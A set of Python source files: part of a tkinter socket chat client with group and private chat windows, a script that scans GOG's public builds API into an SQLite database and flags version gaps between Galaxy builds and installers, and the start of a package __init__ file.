def private_send(client_socket_no, pmy_msg, pmsg_list, event=None): # event is passed by binders.
"""Handles sending of messages."""
print("socket")
print(client_socket_no)
print(pmy_msg)
print(pmsg_list)
msg = pmy_msg.get()
pmy_msg.delete(0, 100) # Clears input field.
print("message sent is: " + msg)
try:
client_socket_no.send(bytes(msg, "utf8"))
except BrokenPipeError:
error_msg = "Unable to send"
pmsg_list.insert(tkinter.END, error_msg)
if msg == "{quit}":
client_socket_no.close()
top.quit()
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
print("socket")
print(client_socket)
msg = my_msg.get()
my_msg.set("") # Clears input field.
try:
client_socket.send(bytes(msg, "utf8"))
except BrokenPipeError:
error_msg = "Unable to send"
msg_list.insert(tkinter.END, error_msg)
if msg == "{quit}":
client_socket.close()
top.quit()
def create_private(name):
print("create_private")
print(name)
new_name = uname.get('1.0', tkinter.END) + '_' + name
new_name = new_name.replace('\n', '')
print(new_name)
Thread(target=private_client, args=(new_name,)).start()
def private_client(name):
pclient_socket = socket(AF_INET, SOCK_STREAM)
pclient_socket.connect(ADDR)
pclient_socket.send(bytes(name, "utf8"))
ptop = tkinter.Tk()
ptop.title("Private Chat - " + uname.get('1.0', tkinter.END))
messages_frame = tkinter.Frame(ptop)
my_msg = tkinter.StringVar() # For the messages to be sent.
# my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
print(my_msg)
entry_field = tkinter.Entry(ptop, textvariable=my_msg)
entry_field.bind("<Return>", lambda event, temp = pclient_socket: private_send(temp, entry_field, msg_list))
entry_field.pack()
send_button = tkinter.Button(ptop, text="Send", command=lambda: private_send(pclient_socket, entry_field, msg_list))
send_button.pack()
send_file_button = tkinter.Button(ptop, text="Send File", command= lambda: private_send_file(pclient_socket))
send_file_button.pack()
receive_thread = Thread(target=private_receive, args=(msg_list, pclient_socket,))
receive_thread.start()
ptop.mainloop() # Starts GUI execution.
def handle_connection_request(name):
new_name = uname.get('1.0', tkinter.END) + '_' + name + '_'
new_name = new_name.replace('\n', '')
Thread(target=private_client, args=(new_name,)).start()
# def on_closing(event=None):
# """This function is to be called when the window is closed."""
# my_msg.set("{quit}")
# try:
# send()
# except BrokenPipeError:
# print("BrokenPipeError")
# top.quit()
#----Now comes the sockets part----
HOST = input('Enter host: ')
PORT = input('Enter port: ')
if not PORT:
PORT = 35000
else:
PORT = int(PORT)
if not HOST:
HOST = '127.0.0.1'
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
top = tkinter.Tk()
top.title("Group Chat")
uname = tkinter.Text(top)
# uname.pack()
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
# my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
send_file_button = tkinter.Button(top, text="Send File", command=send_file)
send_file_button.pack()
# top.protocol("WM_DELETE_WINDOW", on_closing)
# #----Now comes the sockets part----
# HOST = input('Enter host: ')
# PORT = input('Enter port: ')
# if not PORT:
# PORT = 33000
# else:
# PORT = int(PORT)
# BUFSIZ = 1024
# ADDR = (HOST, PORT)
# client_socket = socket(AF_INET, SOCK_STREAM)
# client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
top.mainloop() # Starts GUI execution.
|
gog_builds_scan.py
|
#!/usr/bin/env python3
'''
@author: Winter Snowfall
@version: 3.00
@date: 20/04/2022
Warning: Built for use with python 3.6+
'''
import json
import threading
import sqlite3
import signal
import requests
import logging
import argparse
import difflib
import re
import os
from sys import argv
from shutil import copy2
from configparser import ConfigParser
from datetime import datetime
from time import sleep
from queue import Queue
from collections import OrderedDict
from logging.handlers import RotatingFileHandler
#uncomment for debugging purposes only
#import traceback
##global parameters init
configParser = ConfigParser()
db_lock = threading.Lock()
config_lock = threading.Lock()
terminate_signal = False
##conf file block
conf_file_full_path = os.path.join('..', 'conf', 'gog_builds_scan.conf')
##logging configuration block
log_file_full_path = os.path.join('..', 'logs', 'gog_builds_scan.log')
logger_file_handler = RotatingFileHandler(log_file_full_path, maxBytes=8388608, backupCount=1, encoding='utf-8')
logger_format = '%(asctime)s %(levelname)s >>> %(message)s'
logger_file_handler.setFormatter(logging.Formatter(logger_format))
#logging level for other modules
logging.basicConfig(format=logger_format, level=logging.ERROR) #DEBUG, INFO, WARNING, ERROR, CRITICAL
logger = logging.getLogger(__name__)
#logging level for current logger
logger.setLevel(logging.INFO) #DEBUG, INFO, WARNING, ERROR, CRITICAL
logger.addHandler(logger_file_handler)
##db configuration block
db_file_full_path = os.path.join('..', 'output_db', 'gog_gles.db')
##CONSTANTS
INSERT_BUILD_QUERY = 'INSERT INTO gog_builds VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)'
UPDATE_BUILD_QUERY = ('UPDATE gog_builds SET gb_int_updated = ?, '
'gb_int_json_payload = ?, '
'gb_int_json_diff = ?, '
'gb_total_count = ?, '
'gb_count = ?, '
'gb_main_version_names = ?, '
'gb_branch_version_names = ?, '
'gb_has_private_branches = ? WHERE gb_int_id = ? AND gb_int_os = ?')
INSERT_INSTALLERS_DELTA_QUERY = 'INSERT INTO gog_installers_delta VALUES (?,?,?,?,?,?,?,?,?)'
OPTIMIZE_QUERY = 'PRAGMA optimize'
#static regex pattern for removing GOG version strings from builds/installers
GOG_VERSION_REMOVAL_REGEX = re.compile('GOG[0-9]{0,5}')
#value separator for multi-valued fields
MVF_VALUE_SEPARATOR = '; '
def sigterm_handler(signum, frame):
logger.info('Stopping scan due to SIGTERM...')
raise SystemExit(0)
def terminate_script():
logger.critical('Forcefully stopping script!')
#flush buffers
os.sync()
#forcefully terminate script process
os.kill(os.getpid(), signal.SIGKILL)
def gog_builds_query(product_id, os, scan_mode, session, db_connection):
builds_url = f'https://content-system.gog.com/products/{product_id}/os/{os}/builds?generation=2'
try:
response = session.get(builds_url, timeout=HTTP_TIMEOUT)
logger.debug(f'BQ >>> HTTP response code: {response.status_code}.')
if response.status_code == 200:
try:
json_parsed = json.loads(response.text, object_pairs_hook=OrderedDict)
total_count = json_parsed['total_count']
logger.debug(f'BQ >>> Total count: {total_count}.')
except:
logger.warning(f'BQ >>> Unable to retrieve total_count for {product_id}, {os}.')
raise Exception()
if total_count > 0:
logger.debug(f'BQ >>> Found builds for id {product_id}, {os}...')
db_cursor = db_connection.execute('SELECT COUNT(*) FROM gog_builds WHERE gb_int_id = ? AND gb_int_os = ?', (product_id, os))
entry_count = db_cursor.fetchone()[0]
#no need to do any processing if an entry is found in 'full', 'products' or 'manual' scan modes,
#since that entry will be skipped anyway
if not (entry_count == 1 and (scan_mode == 'full' or scan_mode == 'products' or scan_mode == 'manual')):
json_formatted = json.dumps(json_parsed, sort_keys=True, indent=4, separators=(',', ': '), ensure_ascii=False)
count = json_parsed['count']
#main and branch version names splitting and annotation logic
if len(json_parsed['items']) != 0:
main_item_list = []
branch_item_list = []
for item in json_parsed['items']:
if item['version_name'] != '':
current_branch = item['branch']
current_version_name = item['version_name']
#there are no blank string branches as of now, only null ones
if current_branch is not None:
branch_item_list.append(f'{current_version_name} ||| {current_branch}')
else:
main_item_list.append(current_version_name)
main_version_names = MVF_VALUE_SEPARATOR.join(main_item_list)
branch_version_names = MVF_VALUE_SEPARATOR.join(branch_item_list)
#older entries may contain only a single un-named version
if main_version_names == '': main_version_names = None
if branch_version_names == '': branch_version_names = None
else:
main_version_names = None
branch_version_names = None
has_private_branches = json_parsed['has_private_branches']
db_cursor.execute('SELECT gp_title FROM gog_products WHERE gp_id = ?', (product_id, ))
result = db_cursor.fetchone()
#entries with just hidden builds will not link to any gog_product entry
product_name = result[0] if result is not None else None
if entry_count == 0:
#gb_int_nr, gb_int_added, gb_int_updated, gb_int_json_payload,
#gb_int_json_diff, gb_id, gb_product_title, gb_os,
#gb_total_count, gb_count, gb_main_version_names,
#gb_branch_version_names, gb_has_private_branches
with db_lock:
db_cursor.execute(INSERT_BUILD_QUERY, (None, datetime.now(), None, json_formatted,
None, product_id, product_name, os,
total_count, count, main_version_names,
branch_version_names, has_private_branches))
db_connection.commit()
logger.info(f'BQ +++ Added a new DB entry for {product_id}: {product_name}, {os}.')
elif entry_count == 1:
#do not update existing entries in a full, products or manual scan, since update/delta scans will take care of that
if scan_mode == 'full' or scan_mode == 'products' or scan_mode == 'manual':
logger.info(f'BQ >>> Found an existing db entry with id {product_id}, {os}. Skipping.')
else:
db_cursor.execute('SELECT gb_int_json_payload, gb_int_title FROM gog_builds '
'WHERE gb_int_id = ? AND gb_int_os = ?', (product_id, os))
existing_json_formatted, existing_product_name = db_cursor.fetchone()
if product_name is not None and existing_product_name != product_name:
logger.info(f'BQ >>> Found a valid (or new) product name: {product_name}. Updating...')
with db_lock:
db_cursor.execute('UPDATE gog_builds SET gb_int_title = ? WHERE gb_int_id = ? AND gb_int_os = ?',
(product_name, product_id, os))
db_connection.commit()
logger.info(f'BQ ~~~ Successfully updated product name for DB entry with id {product_id}, {os}.')
if existing_json_formatted != json_formatted:
logger.debug(f'BQ >>> Existing entry for {product_id}, {os} is outdated. Updating...')
#calculate the diff between the new json and the previous one
#(applying the diff on the new json will revert to the previous version)
diff_formatted = ''.join([line for line in difflib.unified_diff(json_formatted.splitlines(1),
existing_json_formatted.splitlines(1), n=0)])
#gb_int_latest_update, gb_int_json_payload, gb_int_previous_json_diff,
#gb_total_count, gb_count, gb_main_version_names, gb_branch_version_names,
#gb_has_private_branches, gb_id (WHERE clause), gb_os (WHERE clause)
with db_lock:
db_cursor.execute(UPDATE_BUILD_QUERY, (datetime.now(), json_formatted, diff_formatted,
total_count, count, main_version_names, branch_version_names,
has_private_branches, product_id, os))
db_connection.commit()
logger.info(f'BQ ~~~ Updated the DB entry for {product_id}: {product_name}, {os}.')
else:
logger.warning(f'BQ >>> HTTP error code {response.status_code} received for {product_id}, {os}.')
raise Exception()
return True
#sometimes the HTTPS connection encounters SSL errors
except requests.exceptions.SSLError:
logger.warning(f'BQ >>> Connection SSL error encountered for {product_id}, {os}.')
return False
#sometimes the HTTPS connection gets rejected/terminated
except requests.exceptions.ConnectionError:
logger.warning(f'BQ >>> Connection error encountered for {product_id}, {os}.')
return False
except:
logger.debug(f'BQ >>> Builds query has failed for {product_id}, {os}.')
#uncomment for debugging purposes only
#logger.error(traceback.format_exc())
return False
def worker_thread(thread_number, scan_mode):
global terminate_signal
threadConfigParser = ConfigParser()
with requests.Session() as threadSession:
with sqlite3.connect(db_file_full_path) as thread_db_connection:
while not terminate_signal:
product_id, os = queue.get()
retry_counter = 0
retries_complete = False
while not retries_complete and not terminate_signal:
if retry_counter > 0:
logger.debug(f'T#{thread_number} >>> Retry count: {retry_counter}.')
#main iternation incremental sleep
sleep((retry_counter ** RETRY_AMPLIFICATION_FACTOR) * RETRY_SLEEP_INTERVAL)
retries_complete = gog_builds_query(product_id, os, scan_mode, threadSession, thread_db_connection)
if retries_complete:
if retry_counter > 0:
logger.info(f'T#{thread_number} >>> Succesfully retried for {product_id}, {os}.')
else:
retry_counter += 1
#terminate the scan if the RETRY_COUNT limit is exceeded
if retry_counter > RETRY_COUNT:
logger.critical(f'T#{thread_number} >>> Request most likely blocked/invalidated by GOG. Terminating process.')
terminate_signal = True
#forcefully terminate script
terminate_script()
#only do product_id processing on 'windows' build scans
if not terminate_signal and os == 'windows' and product_id % ID_SAVE_INTERVAL == 0:
with config_lock:
threadConfigParser.read(conf_file_full_path)
threadConfigParser['FULL_SCAN']['start_id'] = str(product_id)
with open(conf_file_full_path, 'w') as file:
threadConfigParser.write(file)
logger.info(f'T#{thread_number} >>> Processed up to id: {product_id}...')
queue.task_done()
##main thread start
logger.info('*** Running BUILDS scan script ***')
parser = argparse.ArgumentParser(description=('GOG builds scan (part of gog_gles) - a script to call publicly available GOG APIs '
'in order to retrieve builds information and updates.'))
group = parser.add_mutually_exclusive_group()
group.add_argument('-u', '--update', help='Perform an update builds scan', action='store_true')
group.add_argument('-f', '--full', help='Perform a full builds scan', action='store_true')
group.add_argument('-p', '--products', help='Perform a products-based builds scan', action='store_true')
group.add_argument('-m', '--manual', help='Perform a manual builds scan', action='store_true')
group.add_argument('-d', '--delta', help='Produce a list of ids whose latest builds are exclusive to Galaxy', action='store_true')
args = parser.parse_args()
try:
#reading from config file
configParser.read(conf_file_full_path)
general_section = configParser['GENERAL']
#parsing generic parameters
conf_backup = general_section.get('conf_backup')
db_backup = general_section.get('db_backup')
scan_mode = general_section.get('scan_mode')
#parsing constants
HTTP_TIMEOUT = general_section.getint('http_timeout')
RETRY_COUNT = general_section.getint('retry_count')
RETRY_SLEEP_INTERVAL = general_section.getint('retry_sleep_interval')
RETRY_AMPLIFICATION_FACTOR = general_section.getint('retry_amplification_factor')
except:
logger.critical('Could not parse configuration file. Please make sure the appropriate structure is in place!')
raise SystemExit(1)
#detect any parameter overrides and set the scan_mode accordingly
if len(argv) > 1:
logger.info('Command-line parameter mode override detected.')
if args.update:
scan_mode = 'update'
elif args.full:
scan_mode = 'full'
elif args.products:
scan_mode = 'products'
elif args.manual:
scan_mode = 'manual'
elif args.delta:
scan_mode = 'delta'
#boolean 'true' or scan_mode specific activation
if conf_backup == 'true' or conf_backup == scan_mode:
if os.path.exists(conf_file_full_path):
#create a backup of the existing conf file - mostly for debugging/recovery
copy2(conf_file_full_path, conf_file_full_path + '.bak')
logger.info('Successfully created conf file backup.')
else:
logger.critical('Could find specified conf file!')
raise SystemExit(2)
#boolean 'true' or scan_mode specific activation
if db_backup == 'true' or db_backup == scan_mode:
if os.path.exists(db_file_full_path):
#create a backup of the existing db - mostly for debugging/recovery
copy2(db_file_full_path, db_file_full_path + '.bak')
logger.info('Successfully created DB backup.')
else:
#subprocess.run(['python', 'gog_create_db.py'])
logger.critical('Could find specified DB file!')
raise SystemExit(3)
if scan_mode == 'full':
logger.info('--- Running in FULL scan mode ---')
#catch SIGTERM and exit gracefully
signal.signal(signal.SIGTERM, sigterm_handler)
#theads sync (on exit) timeout interval (seconds)
THREAD_SYNC_TIMEOUT = 30
full_scan_section = configParser['FULL_SCAN']
ID_SAVE_INTERVAL = full_scan_section.getint('id_save_interval')
#number of active connection threads
CONNECTION_THREADS = full_scan_section.getint('connection_threads')
#stop_id = 2147483647, in order to scan the full range,
#stopping at the upper limit of a 32 bit signed integer type
stop_id = full_scan_section.getint('stop_id')
#product_id will restart from scan_id
product_id = full_scan_section.getint('start_id')
#reduce starting point by a save interval to account for any thread overlap
if product_id > ID_SAVE_INTERVAL: product_id -= ID_SAVE_INTERVAL
logger.info(f'Restarting scan from id: {product_id}.')
queue = Queue(CONNECTION_THREADS * 2)
try:
for thread_no in range(CONNECTION_THREADS):
#apply spacing to single digit thread_no for nicer logging in case of 10+ threads
THREAD_LOGGING_FILLER = '0' if CONNECTION_THREADS > 9 and thread_no < 9 else ''
thread_no_nice = THREAD_LOGGING_FILLER + str(thread_no + 1)
logger.info(f'Starting thread T#{thread_no_nice}...')
#setting daemon threads and a max limit to the thread sync on exit interval will prevent lockups
thread = threading.Thread(target=worker_thread, args=(thread_no_nice, scan_mode), daemon=True)
thread.start()
while not terminate_signal and product_id <= stop_id:
logger.debug(f'Processing the following product_id: {product_id}.')
#will block by default if the queue is full
queue.put((product_id, 'windows'))
#will block by default if the queue is full
queue.put((product_id, 'osx'))
product_id += 1
#simulate a regular keyboard stop when stop_id is reached
if product_id > stop_id:
logger.info(f'Stop id of {stop_id} reached. Halting processing...')
#write the stop_id as the start_id in the config file
configParser.read(conf_file_full_path)
configParser['FULL_SCAN']['start_id'] = str(product_id)
with open(conf_file_full_path, 'w') as file:
configParser.write(file)
raise KeyboardInterrupt
except KeyboardInterrupt:
terminate_signal = True
terminate_sync_counter = 0
logger.info('Waiting for all threads to complete...')
#sleep until all threads except the main thread finish processing
while threading.activeCount() > 1 and terminate_sync_counter <= THREAD_SYNC_TIMEOUT:
sleep(1)
terminate_sync_counter += 1
if terminate_sync_counter > THREAD_SYNC_TIMEOUT:
logger.warning('Thread sync on exit interval exceeded! Any stuck threads will now be terminated.')
elif scan_mode == 'update':
logger.info('--- Running in UPDATE scan mode ---')
update_scan_section = configParser['UPDATE_SCAN']
last_id = update_scan_section.getint('last_id')
ID_SAVE_FREQUENCY = update_scan_section.getint('id_save_frequency')
if last_id > 0:
logger.info(f'Restarting update scan from id: {last_id}.')
try:
logger.info('Starting builds update scan on all applicable DB entries...')
with sqlite3.connect(db_file_full_path) as db_connection:
#select all existing ids from the gog_builds table
db_cursor = db_connection.execute('SELECT DISTINCT gb_int_id FROM gog_builds WHERE gb_int_id > ? ORDER BY 1', (last_id, ))
id_list = db_cursor.fetchall()
logger.debug('Retrieved all applicable product ids from the DB...')
#used to track the number of processed ids
last_id_counter = 0
with requests.Session() as session:
for id_entry in id_list:
current_product_id = id_entry[0]
logger.debug(f'Now processing id {current_product_id}...')
complete_windows = False
complete_osx = False
retry_counter = 0
while not (complete_windows and complete_osx) and not terminate_signal:
if retry_counter > 0:
sleep_interval = (retry_counter ** RETRY_AMPLIFICATION_FACTOR) * RETRY_SLEEP_INTERVAL
logger.info(f'Sleeping for {sleep_interval} seconds due to throttling...')
sleep(sleep_interval)
complete_windows = gog_builds_query(current_product_id, 'windows', scan_mode, session, db_connection)
#try other oses as well, if the 'windows' scan goes well
if complete_windows:
complete_osx = gog_builds_query(current_product_id, 'osx', scan_mode, session, db_connection)
if complete_windows and complete_osx:
if retry_counter > 0:
logger.info(f'Succesfully retried for {current_product_id}.')
last_id_counter += 1
else:
retry_counter += 1
#terminate the scan if the RETRY_COUNT limit is exceeded
if retry_counter > RETRY_COUNT:
logger.critical(f'Retry count exceeded, terminating scan!')
terminate_signal = True
#forcefully terminate script
terminate_script()
if not terminate_signal and last_id_counter != 0 and last_id_counter % ID_SAVE_FREQUENCY == 0:
configParser.read(conf_file_full_path)
configParser['UPDATE_SCAN']['last_id'] = str(current_product_id)
with open(conf_file_full_path, 'w') as file:
configParser.write(file)
logger.info(f'Saved scan up to last_id of {current_product_id}.')
logger.debug('Running PRAGMA optimize...')
db_connection.execute(OPTIMIZE_QUERY)
except KeyboardInterrupt:
terminate_signal = True
elif scan_mode == 'products':
logger.info('--- Running in PRODUCTS scan mode ---')
#blank the filter for a really thorough scan, although it usually doesn't make sense (but not always,
#since some "pack" and "dlc" entries do have builds linked to them... hopefully just GOGBears tripping)
#GAME_TYPE_FILTER = ''
#filtering by game_type will drastically reduce the number of scanned ids
GAME_TYPE_FILTER = ' AND gp_game_type = "game"'
try:
logger.info('Starting builds scan (based on products) on all applicable DB entries...')
with sqlite3.connect(db_file_full_path) as db_connection:
#select all existing ids from the gog_products table which are not already present in the
#gog_builds table and atempt to scan them from matching builds API entries
db_cursor = db_connection.execute('SELECT gp_id FROM gog_products WHERE gp_id NOT IN '
f'(SELECT DISTINCT gb_int_id FROM gog_builds ORDER BY 1)'
f'{GAME_TYPE_FILTER} ORDER BY 1')
id_list = db_cursor.fetchall()
logger.debug('Retrieved all applicable product ids from the DB...')
with requests.Session() as session:
for id_entry in id_list:
current_product_id = id_entry[0]
logger.debug(f'Now processing id {current_product_id}...')
complete_windows = False
complete_osx = False
retry_counter = 0
while not (complete_windows and complete_osx) and not terminate_signal:
if retry_counter > 0:
sleep_interval = (retry_counter ** RETRY_AMPLIFICATION_FACTOR) * RETRY_SLEEP_INTERVAL
logger.info(f'Sleeping for {sleep_interval} seconds due to throttling...')
sleep(sleep_interval)
complete_windows = gog_builds_query(current_product_id, 'windows', scan_mode, session, db_connection)
#try other oses as well, if the 'windows' scan goes well
if complete_windows:
complete_osx = gog_builds_query(current_product_id, 'osx', scan_mode, session, db_connection)
if complete_windows and complete_osx:
if retry_counter > 0:
logger.info(f'Succesfully retried for {current_product_id}.')
else:
retry_counter += 1
#terminate the scan if the RETRY_COUNT limit is exceeded
if retry_counter > RETRY_COUNT:
logger.critical(f'Retry count exceeded, terminating scan!')
terminate_signal = True
#forcefully terminate script
terminate_script()
logger.debug('Running PRAGMA optimize...')
db_connection.execute(OPTIMIZE_QUERY)
except KeyboardInterrupt:
terminate_signal = True
elif scan_mode == 'manual':
logger.info('--- Running in MANUAL scan mode ---')
manual_scan_section = configParser['MANUAL_SCAN']
#load the product id list to process
product_id_list = manual_scan_section.get('id_list')
product_id_list = [int(product_id.strip()) for product_id in product_id_list.split(',')]
try:
with requests.Session() as session:
with sqlite3.connect(db_file_full_path) as db_connection:
for product_id in product_id_list:
logger.info(f'Running scan for id {product_id}...')
complete_windows = False
complete_osx = False
retry_counter = 0
while not (complete_windows and complete_osx) and not terminate_signal:
if retry_counter > 0:
logger.warning(f'Reprocessing id {product_id}...')
#allow a short respite before re-processing
sleep(2)
complete_windows = gog_builds_query(product_id, 'windows', scan_mode, session, db_connection)
#try other oses as well, if the 'windows' scan goes well
if complete_windows:
complete_osx = gog_builds_query(product_id, 'osx', scan_mode, session, db_connection)
if complete_windows and complete_osx:
if retry_counter > 0:
logger.info(f'Succesfully retried for {product_id}.')
else:
retry_counter += 1
#terminate the scan if the RETRY_COUNT limit is exceeded
if retry_counter > RETRY_COUNT:
logger.critical(f'Retry count exceeded, terminating scan!')
terminate_signal = True
#forcefully terminate script
terminate_script()
logger.debug('Running PRAGMA optimize...')
db_connection.execute(OPTIMIZE_QUERY)
except KeyboardInterrupt:
terminate_signal = True
elif scan_mode == 'delta':
logger.info('--- Running in DELTA scan mode ---')
#strip any punctuation or other grouping characters from builds/versions
STRIP_OUT_LIST = [' ', ',', '.', '-', '_', '[', ']', '(', ')', '{', '}', '/', '\\']
detected_discrepancies = {'windows': [], 'osx': []}
try:
with sqlite3.connect(db_file_full_path) as db_connection:
#select all existing ids from the gog_builds table (with valid builds) that are also present in the gog_products table
db_cursor = db_connection.execute('SELECT gb_int_id, gb_int_os, gb_int_title, gb_main_version_names FROM gog_builds WHERE gb_int_id IN '
'(SELECT gp_id FROM gog_products ORDER BY 1) AND gb_main_version_names IS NOT NULL ORDER BY 1')
delta_list = db_cursor.fetchall()
logger.debug('Retrieved all applicable product ids from the DB...')
for delta_entry in delta_list:
current_product_id = delta_entry[0]
current_os = delta_entry[1]
#'osx' compatible products have installer os field listings of 'mac', not 'osx'
current_os_files = 'mac' if current_os == 'osx' else current_os
logger.debug(f'Now processing id {current_product_id}, {current_os}...')
current_product_title = delta_entry[2]
current_main_version_names = delta_entry[3].split(MVF_VALUE_SEPARATOR)
logger.debug(f'Current builds main version names are: {current_main_version_names}.')
#restricing languages to "en" only will solve a lot of version discrepancy problems, as some installers get misversioned non-english languages
#added at later points in time, however the following titles will no longer be tracked because of this (mentioning them here for future reference):
#
#Kajko i Kokosz 1720224179 pl
#Wolfenstein II: The New Colossus German Edition 1285433790 de
#Anstoss 2 Gold Edition 1808817480 de
#ANSTOSS 3: Der Fußballmanager 1886141726 de
#
db_cursor = db_connection.execute('SELECT DISTINCT gf_version FROM gog_files WHERE gf_int_id = ? AND gf_int_removed IS NULL AND gf_language = "en" '
'AND gf_int_download_type = "installer" AND gf_os = ? AND gf_version IS NOT NULL ORDER BY gf_int_added DESC LIMIT 1',
(current_product_id, current_os_files))
latest_version = db_cursor.fetchone()
if latest_version is not None:
current_latest_build_version_orig = current_main_version_names[0].strip()
logger.debug(f'Current latest main build version is: {current_latest_build_version_orig}.')
current_latest_file_version_orig = latest_version[0].strip()
logger.debug(f'Current latest file version is: {current_latest_file_version_orig}.')
excluded = False
#convert to uppercase for comparisons
current_latest_build_version = current_latest_build_version_orig.upper()
current_latest_file_version = current_latest_file_version_orig.upper()
#remove any (A) identifier from build versions
current_latest_build_version = current_latest_build_version.replace('(A)', '')
#remove any (A) identifier from file versions
current_latest_file_version = current_latest_file_version.replace('(A)', '')
#remove any 'GALAXY HOTFIX' and 'GOG HOTFIX' strings from build versions
current_latest_build_version = current_latest_build_version.replace('GALAXY HOTFIX', '')
current_latest_build_version = current_latest_build_version.replace('GOG HOTFIX', '')
#remove punctuation/formatting/grouping characters
for stripped_item in STRIP_OUT_LIST:
current_latest_build_version = current_latest_build_version.replace(stripped_item, '')
current_latest_file_version = current_latest_file_version.replace(stripped_item, '')
#strip any version/build set that starts with the letter 'V'
if current_latest_build_version.startswith('V') and current_latest_file_version.startswith('V'):
current_latest_build_version = current_latest_build_version[1:]
current_latest_file_version = current_latest_file_version[1:]
#strip any version/build set that starts with the letter 'A'
if current_latest_build_version.endswith('A') and current_latest_file_version.endswith('A'):
current_latest_build_version = current_latest_build_version[:-1]
current_latest_file_version = current_latest_file_version[:-1]
#remove (GOG-X) strings
current_latest_build_version = GOG_VERSION_REMOVAL_REGEX.sub('', current_latest_build_version)
logger.debug(f'Comparison build version is: {current_latest_build_version}.')
current_latest_file_version = GOG_VERSION_REMOVAL_REGEX.sub('', current_latest_file_version)
logger.debug(f'Comparison file version is: {current_latest_file_version}.')
#exclude any blank entries (blanked after previous filtering)
#as well as some weird corner-case matches due to GOG versioning madness
if current_latest_file_version == '' or current_latest_build_version == '':
excluded = True
elif current_latest_build_version[0] == 'V' and current_latest_build_version[1:] == current_latest_file_version:
excluded = True
elif current_latest_build_version[-1] == 'A' and current_latest_build_version[:-1] == current_latest_file_version:
excluded = True
elif current_latest_file_version[-1] == 'A' and current_latest_file_version[:-1] == current_latest_build_version:
excluded = True
if not excluded and current_latest_file_version != current_latest_build_version:
#add detected discrepancy to its os list
detected_discrepancies[current_os].append(current_product_id)
#use MAX on gid_int_false_positive, although there should only ever be one entry
db_cursor.execute('SELECT COUNT(*), MAX(gid_int_false_positive) FROM gog_installers_delta WHERE gid_int_id = ? '
'AND gid_int_os = ? AND gid_int_fixed IS NULL', (current_product_id, current_os))
installer_delta_entry_count, current_false_positive = db_cursor.fetchone()
#false positive status should be set to False for new entries
current_false_positive = False if current_false_positive is None else current_false_positive
if installer_delta_entry_count != 0:
db_cursor.execute('SELECT COUNT(*) FROM gog_installers_delta WHERE gid_int_id = ? AND gid_int_os = ? '
'AND gid_int_latest_galaxy_build = ? AND gid_int_latest_installer_version = ? AND gid_int_fixed IS NULL',
(current_product_id, current_os, current_latest_build_version_orig, current_latest_file_version_orig))
installer_version_delta_entry_count = db_cursor.fetchone()[0]
if installer_version_delta_entry_count != 0:
logger.debug(f'Discrepancy already logged for {current_product_id}: {current_product_title}, {current_os}. Skipping.')
else:
logger.debug(f'Found outdated discrepancy for {current_product_id}: {current_product_title}, {current_os}.')
if current_false_positive:
#any updates to a discrepancy should reset the false positive state of an entry
current_false_positive = False
logger.warning(f'False positive status has been reset for {current_product_id}, {current_os}.')
db_cursor.execute('UPDATE gog_installers_delta SET gid_int_latest_galaxy_build = ?, gid_int_latest_installer_version = ?, '
'gid_int_false_positive = ? WHERE gid_int_id = ? AND gid_int_os = ? AND gid_int_fixed IS NULL',
(current_latest_build_version_orig, current_latest_file_version_orig,
current_false_positive, current_product_id, current_os))
db_connection.commit()
logger.info(f'~~~ Successfully updated the entry for {current_product_id}: {current_product_title}, {current_os}.')
else:
logger.debug(f'Found new discrepancy for {current_product_id}: {current_product_title}, {current_os}.')
#gid_int_nr, gid_int_added, gid_int_fixed, gid_int_id, gid_int_title,
#gid_int_os, gid_int_latest_galaxy_build, gid_int_latest_installer_version
#gid_int_false_positive
db_cursor.execute(INSERT_INSTALLERS_DELTA_QUERY, (None, datetime.now(), None, current_product_id, current_product_title,
current_os, current_latest_build_version_orig, current_latest_file_version_orig,
current_false_positive))
db_connection.commit()
logger.info(f'+++ Successfully added an entry for {current_product_id}: {current_product_title}, {current_os}.')
else:
logger.debug(f'Product with id {current_product_id} is on the exclusion list. Skipping.')
#verify if previosly logged discrepancies have been fixed
db_cursor.execute('SELECT DISTINCT gid_int_id, gid_int_title, gid_int_os FROM gog_installers_delta WHERE gid_int_fixed IS NULL ORDER BY 1')
discrepancy_list = db_cursor.fetchall()
for discrepancy in discrepancy_list:
current_product_id = discrepancy[0]
current_product_title = discrepancy[1]
current_os = discrepancy[2]
if current_product_id not in detected_discrepancies[current_os]:
logger.debug(f'Discrepancy for {current_product_id}: {current_product_title}, {current_os} has been fixed.')
db_cursor.execute('UPDATE gog_installers_delta SET gid_int_fixed = ?, gid_int_false_positive = 0 WHERE gid_int_id = ? AND gid_int_os = ? '
'AND gid_int_fixed IS NULL', (datetime.now(), current_product_id, current_os))
db_connection.commit()
logger.info(f'--- Successfully updated fixed status for {current_product_id}: {current_product_title}, {current_os}.')
logger.debug('Running PRAGMA optimize...')
db_connection.execute(OPTIMIZE_QUERY)
except KeyboardInterrupt:
terminate_signal = True
if not terminate_signal and scan_mode == 'update':
logger.info('Resetting last_id parameter...')
configParser.read(conf_file_full_path)
configParser['UPDATE_SCAN']['last_id'] = '0'
with open(conf_file_full_path, 'w') as file:
configParser.write(file)
logger.info('All done! Exiting...')
##main thread end
|
__init__.py
|
# -*- coding: utf-8 -*-
import logging as _logging
import sys
__author__ = 'luckydonald'
